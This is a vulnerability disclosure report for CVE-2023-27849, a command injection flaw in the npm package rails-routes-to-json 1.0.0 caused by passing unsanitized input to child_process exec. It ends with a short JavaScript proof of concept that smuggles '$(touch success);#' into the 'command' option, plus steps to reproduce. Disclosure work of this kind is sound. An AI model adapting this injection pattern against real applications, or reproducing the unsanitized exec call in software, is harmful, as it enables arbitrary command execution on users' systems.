CVE-2023-27849: Vulnerability-Reports/report.md at 2211ea4712f24d20b7f223fb737910fdfb041edb · omnitaint/Vulnerability-Reports
rails-routes-to-json v1.0.0 was discovered to contain a remote code execution (RCE) vulnerability via the child_process exec function.
Vulnerability in rails-routes-to-json
This report details an arbitrary command injection (ACI) vulnerability affecting rails-routes-to-json@1.0.0.
Package source
- https://www.npmjs.com/rails-routes-to-json
Vulnerability Overview
Affected versions of this package are vulnerable to arbitrary command injection (CWE-77 [1]).
If attacker-controlled user input is given to the "command" key of the "options" argument of the package constructor, an attacker can execute arbitrary commands on the operating system on which the package is run.
This vulnerability is due to use of the child_process exec function without input sanitization. exec runs the supplied string through a shell, so shell metacharacters (command substitution, `;`, `|`, and so on) in the "command" value are interpreted rather than passed literally. The Node.js API documentation states that unsanitized user input should never be passed to exec [2].
[1] https://cwe.mitre.org/data/definitions/77.html
[2] https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback
Reproduction
To exploit this vulnerability, another package must include "rails-routes-to-json" as a dependency and pass user-controlled input to the "command" option of "rails-routes-to-json".
The proof-of-concept (PoC) program below illustrates the issue. Executing this code causes the command `touch success` to be run, creating a file called `success` in the current directory.
```js
var PUT = require('rails-routes-to-json');
// Shell command substitution inside the "command" option; "#" comments out the rest of the line.
var x = "$(touch success);#";
try {
  new PUT({'command': x}, function(x) {});
} catch (e) {
  console.log(e);
}
```
Steps to reproduce:
- npm i rails-routes-to-json@1.0.0
- Create a file, e.g., poc0.js, containing the PoC code.
- Execute the file: node poc0.js